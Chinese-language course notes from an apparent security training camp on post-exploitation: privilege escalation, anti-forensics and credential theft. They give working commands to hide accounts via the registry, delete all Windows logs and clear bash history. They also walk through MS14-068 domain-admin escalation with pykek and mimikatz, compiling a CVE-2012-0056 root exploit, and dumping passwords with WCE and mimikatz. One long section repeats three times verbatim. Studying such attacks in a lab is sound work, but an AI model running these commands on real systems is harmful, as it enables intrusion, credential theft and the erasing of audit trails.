通过漏洞提权 是因为操作系统没有打好补丁
929人加入学习
(11人评价)
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习
操作系统 还有一些操作系统软件
操作系统内核对用户的进程权限控制不严格造成的
proc目录 不是在系统内存中实时生成的 只有硬盘启动才 有关机存在 启动会在linux生成的一个临时文件 保存的很多当前操作系统的内存运行数据 本身就是内存映射的数据 在linux 操作系统运行很多程序的时候 都会子操作系统里面生成很多 这个程序对于的pid值me
凡是所有高于2,6.39都存在这个漏洞 低于这个版本且很少
如何去执行 利用 利用代码
域是一个安全边界在这个边界里面会有一台机器作为域的控制器 控制域里面所有资源 有这个域的账号密码就可以控制这个域里面所有的电脑
所以 在企业 是控制所有的 域里面也有很多重要的系统
作为域管理器必须是sever 不是win7或者win8
对域不熟悉 可以看微软 ss4t 本身 在企业里面一旦创建啦域 就会给企业里面每个人分配账号 和密码
有限资源
管理员可以在域里面随便登陆
利用思路
之前提权是已经是系统管理员的权限的情况提示成为system 或者是已有操作系统管理权限查看密码
登陆到操作系统 但是操作权限很低
通过域的组策略来统一的管理 控制员工账号
从普通到system 利用操作系统漏洞 特有的漏洞
实现提权目的
windows操作系统实例 :没有安装很多补丁 就利用这个漏洞提升权限
python的脚本放在windows里面需要解释性语言环境 否则windows可能将他看成txt文档
如果说打印好补丁 利用代码就失去作用
浏览器会把相应的账号和密码添加到·相应的表单 然后登陆 甚至不需要登陆按钮
如果说已经登陆到机器上 通过各种方法获得吧浏览器中保存的历史账号密码
操作系统不保存明文账号会对你的账号进行一个hash值计算 把这个hash值存放在机器上 登陆到操作系统 登陆是有登陆主键将这个密码进行hash值计算比对 两个hash一直 就匹配成功 如果不匹配 就不让使用
键盘记录器 记录目标系统的键盘敲击 猜测密码
或者完整版的木马程序自带键盘记录器
灰鸽子 生成服务器端 上去到目标机器
木马只是一种远程软件的称呼吧
提权利用系统的特性或者是抓包工具
使用嗅探的方法 来在目标系统之上嗅探目标机器的网络流量 来获得更多的账号和密码
实线是单一 虚线是多种 逐个ip隐藏下来抓包分析过程
ftp端口是21
ftp登陆服务器 先尝试一个匿名的账号密码登陆
admin 提权到system
目标获得administrator 提权system
不同的操作系统方法稍微不同
guest权限比较低
3389别人连接
服务在默认的情况下以system启动工作在system
思路就是 所有的服务都是通过system来执行的上
这个服务就会调用system这个账号来执行 启动之后被启动的账号和密码就会工作在这个权限里面具有system的权限
提权
溢出一个漏洞 获得shell 长时间控制 扩大我们战果
获取啦目标系统的账号和密码 使得我们通过远程的方式登录到目标系统 一旦登录啦 就上传木马
登录到目标系统 发现得到的是一个低的权限账号 小权限的账号 获得更高的权限
本地提权
现在操作系统 多用户操作系统 一个操作系统多个用户和账号可以是某一个用户的账号 也可以是为某一个应用软件创建的一个账号 让某些账号就以这这些权限进行服务
在目标系统上为不同的用户 不同的人 不同的应用软件 都创建各自独立的账号 含有不同的权限 完成自己应该完成的事情就足够
所以有时候 是一个低权限的账号 拿到账号和密码 控制目标操作系统也很远
隔离已经成为基本操作系统的基础 所有的操作系统应该控制不同账号会话是隔离
操作系统 :用户空间 和
操作系统内核空间 内核操作是用户不能操作的
在内核的空间也分不同的权限 有的可以对底层可以操作 有的只有一点 所以对用户安全检查的时候
对于用户权限的赋予是作为安全设计非常主要的事情
操作系统有一个最高权限的账号 可以生成很多低权限的账号 这些应用账号 和用户账号 我们管理员可以给他很多不同的权限 这些权限只有当用户登录到操作系统上 操作系统会根据设置的权限项 吧这些权限分送用户 然后生成一个实时令牌文件 这个文件可以做什么事情 什么工作 绑定到用户会话上 当用户注销 这个令牌就会没有用 每一个令牌都有随机的id数
服务账号对应的服务在操作系统开启的时候就随着后台开启服务
admministor 可以对所有管理
操作系统上 很多注册表 系统文件 administrator还不一定可以删
目标 从user 到administrator 到system
system对前面用户和权限不完全是强制的
linux 是root账号
Windows:
1、禁止在登录界面显示新建账号
2、REG ADD "HKEY_LOCAL/-MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v username(需要隐藏的用户名) /T REG_DWORD /D 0
3、del %WINDIR%\*.LOG /a/s/q/f :删除windows目录下的所有日志文件
Linux:
History:历史命令行
history -c 进行清除
chattr +i .bash_history:赋予 .bash_history文件以i属性--不可写,需将文件删除,再创建一个新的文件
日志:/var/log/目录下
auth.log / secure
btmp / wtmp(以下四个文件必须通过命令显示)
lastlog / failog
其他日志和HIDS等
Widows信息收集:
WMIC(Windows Management Instrumentation)
可以实现一下普通命令行无法实现的功能
wmic nicconfig get aipaddress, macaddress:显示IP 和MAC 地址
wmic computersystem get username:显示用户名
wmic netlogin get name, lastlogon:显示登录用户以及登录时间
wmic process get caption, executablepath, commandline:显示进程对应的程序
wmic process where name="calc.exe" call terminate:结束"calc.exe"进程
wmic os get name, servicepackmajorversion:查询主机版本以及所打的包
wmic product get name,version:查主机所安装软件和版本
wmic product where name="name" call unistall /nointeractive:无交互下删除"name"程序(悄悄地)
wmic share get /ALL:查看共享文件夹
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1":开启远程桌面,如:/node:localhost 则开启本机远程桌面
wmic ntenetlog get path, filename, writeable:查看当前系统日志对应的文件
收集敏感数据:
商业信息
系统信息
Linux:
/etc; /usr/local/etc
/etc/password; /etc/shadow
~/.ssh/; ~/.gnupg/ 公私钥
The e-mail and data files
业务数据库; 身份认证服务器数据库
~/tmp 临时数据目录中隐私泄露
Windows:
SAM数据库; 注册表文件
%SYSTEMROOT%\repair\SAM:备份版本
%SYSTEMROOT%\System32\config\RegBack\SAM:备份版本
业务数据库; 身份认证数据库
临时文件目录
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
Linux:
/etc/resolv.conf
/etc/passwd
/etc/shadow
whoami,who -a
ifconfig -a, iptables -L -n., netstat -nr
uname -a, ps aux
dpkg -l | head
Windows:
ipconfig /all, ipconfig /displaydns,
netstat -bnao, netstat -r
net view, net view /domain:查网络共享
net user /domain, net user %username% /domain:网络域
net accounts, net share:网络共享
net group "Domain Controllers" /domain:在域网络下,查看"Domain Controllers"的所有域用户
net localgroup administrators username /add:在管理员组中添加username账户
net share name$=C:\ /unlimited:将C盘完全共享
net user username /active:yes /domain:将暂停使用账号启用(需要域管理员权限)
该方法在企业环境中比较常用,因为企业中往往及时更新补丁
配置不当:
1、程序以system权限启动
2、NTFS权限允许users修改删除
3、Windows下:
icacals c:\windows\*.exe /save perm /T
可以得到一个文本,文本中可以查看到逾越权限的程序
Linux下:
find / -perm 777 -exec ls -l {} \;
如:
应用连接数据库的配置文件
后台服务运行账号
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
1、pwdump localhost
2、fgdump
3、mimikatz
能在内存中读取用户认证信息
在该程序命令行下:
::--help
有以下模块:
privilege、process、service、lsadump、ts、event、misc
Windows身份认证过程:
不同的登录方式,有不同的验证响应方式
NTLM本地组包
Remote远程
域控制kerberos
kali中有WCE,,可以将其复制使用:
/usr/share/wce/
wce命令:
-l:显示已登录用户的身份信息
-v:显示具体信息
用户session、用户ID
-d luid :从登录会话删除NTLM认证信息
-e / r:列出登录会话和NTLM认证信息,刷新
-g password:生成LM 和 NT hash
-w:显示明文密码,该方法是通过内存中读取
wce与pwdump的区别:
wce从内存读取用户认证信息
Pw是从SAM文件中读取
注意:WCE读取用户的认证信息首先是通过安全模式在内存中读取,如果失败则会通过非安全模式注入代码到系统进程,这样可能会造成系统崩溃甚至是系统的损坏。
防护:修改注册表项
一、浏览器缓存密码
常见的浏览器都有“记住密码”的功能
IE浏览器
Firefox
二、网络密码
如一些域密码、邮箱密码,在本地可以查看
三、无线密码
http://www.nirsoft.net,该网站中有大量相关工具
在Kali中有相关的Windows工具:例如PwDump.exe
可以将其拷贝出来使用
键盘记录:
Keylogger:通过该程序直接实现
木马窃取:通过一些木马程序中自带的功能实现
授课教师
安全经理
课程特色
视频(16)
下载资料(1)
